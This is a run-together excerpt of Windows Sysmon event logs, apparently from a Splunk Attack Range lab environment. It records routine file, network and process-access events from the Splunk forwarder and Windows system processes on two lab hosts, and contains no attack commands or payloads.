Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CA4D2AFED79659C678CA34501E84A61,SHA256=367501B0C2FFBD55F7DDE73F8B33929B87D192F3C1522D3804C4645A45DE26D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:31.365{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF6A110C5291A46A9C5AD74BFF170694,SHA256=7561B8A572EC63C756D70490F6B6A1A93BB8C1DBCEEE3495BA1E93988B845EE4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:32.740{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:32.740{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:32.740{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:32.584{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=141F595728AC9A60B6088AECD76907C8,SHA256=3CF587186EC171D0E312C3CAB628CAFC55BAD31909A11D15657F4628F5E9727D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:32.191{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=553A05C58369C329831CA9D3BD33E723,SHA256=489940E37333975C2C3E5F3E025E33136AA18205AF1F8233180B77FA4ECA1BAD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:29.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51736-false10.0.1.12-8000- 23542300x8000000000000000222701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:33.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A827A21EA05C187DA71381DF92D52F05,SHA256=62E2C1B5D98005F9014E1C6F4C9FB5C04C1D7E0DE097C8809B3D6714FE0C9603,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:33.659{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=EAB86FD5D8A3E6B4EFAF201B5B80669C,SHA256=DA4F8859DBA01F1A8791AC0ED488673A3877C6F61177D0C8C247DFD28555EE01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:33.225{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EACC4975F9DA330D6F64995D106C9E3,SHA256=4D265A8FDFC290B5C83B0F397A7745E6E6DDA0B2597C8BA8F0E210F53F74B9F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:34.787{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA5DDF2B3FCCE41063272E735CF8B62,SHA256=A9CD9851B949964F58AB96665B26C38E7AA3CBD10026CFC3219FCBA8A38C87C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:34.243{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10985534FEF6F6C52FB6C5F0607F21F8,SHA256=2AC4729C3D1113256657EA32B065FE14D4C09F1371EA85AB003F799634A366BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:35.787{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=257F7522B5073BADEE988014CBB830EB,SHA256=31974E11C93FF71699518EFBE31A63BF59BAB70EAFD12CF3A2BB236D392C7CD8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:33.686{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49570-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:35.244{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EC296FA9BD26C8437B00272830550D0,SHA256=401909D43C0026E8BE6464D99FB3FA52088D97909120BEFAC8AF1D483A6D7995,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:36.834{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=498FCD6682FDF11169DD831E4B623E7B,SHA256=8181ACC1D02D0A335E867E8D91F42103CEE2B624E0BC857D359D0F84AD7CAF0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:36.259{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C701BDE164E9C762E4E6DF51602BB279,SHA256=16D5140BE2E73B41C5627C7873F06AD27094E478A0711981BA54107B49D7FA84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:37.928{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A3FD9E51F7EBC089D3E64A379025979,SHA256=9E7C15E237F3FFD933F05C96DF7294050D95C0DFDF9392E906D96A33641469BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:37.274{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBA7C49BFC1B85D54197D75F522FFA67,SHA256=61AD240DA0F15A30A1FD507F90E41C8855E596B1B7ABE7D9136E15C46671D0FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:35.603{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51737-false10.0.1.12-8000- 23542300x8000000000000000298928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:38.292{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8008CB29FF6D5332165C99E7B406E5EB,SHA256=A886B86E8F70471A8094F1C40911B79D8892C2F4A323A93902CA20B178119177,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:39.293{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ABA02F83E38E2096951B1BB0BC282A6,SHA256=E3F376673B15AC82EC3992F3D8E2737A79C5A49A9DA9C0D3032BD5F8021668B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:39.146{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63CAF181184D78302D4BFCFCC01C0EA2,SHA256=5D8B5ADF04E8409E38DAE29A9E1EB75157E4207D14253FC5DE248732D79EC780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:40.256{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=417A5FAC18C77CC9A4B9434C4116F4FA,SHA256=D2EE3D2A04325129FB6797403B87F3738471C2193901C1C3657FCFFFD3005C24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:40.692{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:40.328{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F841D7F922920269C81C7F813E7E7243,SHA256=2B63C0CADFC95B8390E741A797EF77DED729D56C6E4A5E29930E59F213F04679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:41.459{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEAE118BE336DB8601C2DEA863E7D880,SHA256=75324724E3539005CB169F4AFE19B6828BABC1BA3ABEDF30616E3605E8F195D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:39.708{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49571-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:41.360{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4747B29F80D5BFD88CF951E6CBD44ED,SHA256=701C8F9E87F643E24E38486FD2068DA0DE6EF78A21919AAAD90A2C048BBB7443,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:42.474{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66AC40824E52993CF867312B65F0F034,SHA256=AA387931E889480ABDC2101F870665441E052F1535EB07FB733CBC386A1D9C0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:40.108{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49572-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000298934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:42.377{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBC8A0F84D092BDDC92B050A276F70BF,SHA256=867A4286D55CFE9010391D5DA991F38704A14B629D9D1FDBB9482FD2F5F46D95,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:40.634{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51738-false10.0.1.12-8000- 23542300x8000000000000000222711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:43.474{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE85208B36FC3CDAB04711541ACCD175,SHA256=23A43AAC5FA53E53F6887B4FBEB1C40A165958C5FCC0F49C8F32F1745273D730,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:43.392{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27BA66EDDBB0F8D532A39BACA149A46E,SHA256=B4866C9925004919B06A540CA6051021C0A09549AB75CBD8B01676590538B8B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:44.392{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D74A0D46E1330FFBC0EB6140E30EE8B9,SHA256=64BF41CC924F4BD30D7154828F3D79C6AF71745620C9FCC46EB6F0EA284845BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-197C-6216-4805-000000003902}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-197C-6216-4805-000000003902}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 